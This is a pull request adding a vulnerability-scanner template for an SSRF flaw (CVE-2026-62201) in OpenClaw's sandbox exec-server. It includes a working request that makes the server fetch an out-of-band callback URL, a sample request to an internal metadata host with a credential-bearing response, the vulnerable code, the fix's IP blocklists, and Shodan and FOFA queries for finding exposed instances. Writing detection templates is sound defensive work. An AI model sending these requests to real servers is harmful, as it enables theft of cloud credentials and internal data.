### PR TITLE
add(CVE-2026-62201): OpenClaw sandbox exec-server SSRF

### DIFF
--- a/http/cves/2026/CVE-2026-62201.yaml
+++ b/http/cves/2026/CVE-2026-62201.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-62201
+
+info:
+  name: OpenClaw < 2026.6.6 - SSRF via Sandbox Exec-Server
+  author: diedromeo
+  severity: high
+  description: |
+    OpenClaw before 2026.6.6 does not enforce network policies on HTTP requests transiting the sandbox exec-server. The exec-server's embedded Python HTTP helper accepts arbitrary URLs without validating the target hostname or resolved IP address, allowing a lower-trust caller to reach internal network destinations (cloud metadata endpoints, private IPs, localhost services) that configured policies should block.
+  impact: |
+    An attacker with low-privilege access can exfiltrate data from internal services, access cloud instance metadata (including IAM credentials), and pivot to otherwise unreachable network segments.
+  remediation: Upgrade to OpenClaw 2026.6.6 or later.
+  reference:
+    - https://github.com/openclaw/openclaw/security/advisories/GHSA-mgvr-6gvw-3rgr
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-62201
+    - https://www.vulncheck.com/advisories/openclaw-network-policy-bypass-via-exec-server
+    - https://github.com/openclaw/openclaw/commit/21410d1c
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2026-62201
+    cwe-id: CWE-918
+  metadata:
+    max-request: 1
+    vendor: openclaw
+    product: openclaw
+    shodan-query: http.html:"openclaw" http.html:"exec"
+    fofa-query: body="openclaw" && body="exec"
+  tags: cve,cve2026,openclaw,ssrf,oast
+
+http:
+  - raw:
+      - |
+        POST /exec/http HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"method":"GET","url":"http://{{interactsh-url}}/","headers":[]}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "bodyBase64"


### PR DESCRIPTION
## Summary

New template for **CVE-2026-62201** — OpenClaw sandbox exec-server SSRF (network policy bypass).

## Vulnerability

OpenClaw before 2026.6.6 does not enforce network policies on HTTP requests transiting the sandbox exec-server. The exec-server's embedded Python HTTP helper (`SANDBOX_HTTP_REQUEST_SCRIPT`) accepts arbitrary URLs without validating the target hostname or resolved IP address. A lower-trust caller can reach internal network destinations that configured policies should block.

**CWE-918 (Server-Side Request Forgery)** · CVSS 7.7 High

## Root Cause

In [`extensions/codex/src/app-server/sandbox-exec-server/http.ts`](https://github.com/openclaw/openclaw/blob/main/extensions/codex/src/app-server/sandbox-exec-server/http.ts), the `httpRequest()` function passed the user-supplied URL directly to a Python subprocess that called `urllib.request.urlopen()` with only a scheme check (`http`/`https`). No hostname blocklist, no private IP detection, no DNS resolution pinning, and no redirect guarding.

### Vulnerable code (before fix)

```python
# From openclaw@2026.6.5 SANDBOX_HTTP_REQUEST_SCRIPT
def main():
    input_data = json.load(sys.stdin)
    url = str(input_data.get("url", ""))
    parsed = urllib.parse.urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError("http/request only supports http and https URLs")
    # No hostname/IP validation — any URL is fetched
    with urllib.request.urlopen(request, timeout=timeout) as response:
        handle_response(input_data, response)
```

### Fix ([commit `21410d1c`](https://github.com/openclaw/openclaw/commit/21410d1c))

Added `assertSandboxHttpRequestTargetAllowed()` in TypeScript and `assert_url_allowed()` in the Python helper with:

- Blocked hostname set (`localhost`, `metadata.google.internal`, `*.internal`, `*.local`)
- Private/reserved/loopback/link-local IP detection
- Cloud metadata IP blocking (`169.254.169.254`, `100.100.100.200`, `fd00:ec2::254`)
- DNS resolution pinning (resolve hostname → check resolved IP → pin for the actual request)
- `GuardedRedirectHandler` that validates every redirect target
- IPv6-embedded-IPv4 extraction (mapped, 6to4, Teredo, ISATAP)
- Blocked IPv4/IPv6 network ranges (CGN `100.64.0.0/10`, benchmarking `198.18.0.0/15`, etc.)

## References

| Source | Link |
|---|---|
| GitHub Security Advisory | https://github.com/openclaw/openclaw/security/advisories/GHSA-mgvr-6gvw-3rgr |
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2026-62201 |
| VulnCheck Advisory | https://www.vulncheck.com/advisories/openclaw-network-policy-bypass-via-exec-server |
| Fix commit | https://github.com/openclaw/openclaw/commit/21410d1c |
| Vulnerable source (http.ts) | https://github.com/openclaw/openclaw/blob/main/extensions/codex/src/app-server/sandbox-exec-server/http.ts |

## Verification

Tested against real code extracted from official npm packages:

| Target | Version | Result |
|---|---|---|
| Vulnerable | `openclaw@2026.6.5` exec-server | ✅ SSRF successful — internal service data exfiltrated |
| Patched | `openclaw@2026.6.6` exec-server | ✅ Blocked — `ValueError: Blocked: resolves to private/internal/special-use IP address` |

### Request (SSRF to internal metadata service)
```http
POST /exec/http HTTP/1.1
Host: target:8300
Content-Type: application/json

{"method":"GET","url":"http://metadata.internal/","headers":[]}
```

### Response from vulnerable exec-server (HTTP 200)
```json
{
  "status": 200,
  "bodyBase64": "eyJzZWNyZXQiOiJBS0lBX0ZBS0VfQVdTX1NFQ1JFVF9LRVlfMTIzNDUi...}"
}
```
Decoded body contains internal API response with credentials — confirms SSRF.

### Response from patched exec-server (HTTP 502)
```json
{
  "error": "ValueError: Blocked: resolves to private/internal/special-use IP address"
}
```